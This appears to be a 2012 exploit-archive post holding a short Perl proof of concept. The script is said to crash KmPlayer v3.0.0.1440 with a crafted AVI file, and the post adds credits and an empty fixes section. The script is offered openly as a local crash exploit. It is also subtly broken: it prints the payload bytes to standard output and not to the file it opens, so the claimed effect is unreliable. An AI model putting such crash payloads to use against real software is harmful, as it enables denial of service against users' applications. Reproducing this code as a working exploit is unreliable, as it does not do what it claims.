KmPlayer v3.0.0.1440 Local Crash PoC
2012-10-27 01:04:49Posted by: irist.ir
#!/usr/bin/perl
#Title : KmPlayer v3.0.0.1440 Local Crash PoC
#Discovered By : Am!r
#Home : http://IrIsT.Ir/forum/
#tested : XP
#TNX : Alireza , C0dex , B3hz4d
my $po="\x46\x02\x00\x00";
open(C, ">:raw", "poc.avi");
print $po;
close(C);
Fixes
No fixesIn order to submit a new fix you need to be registered.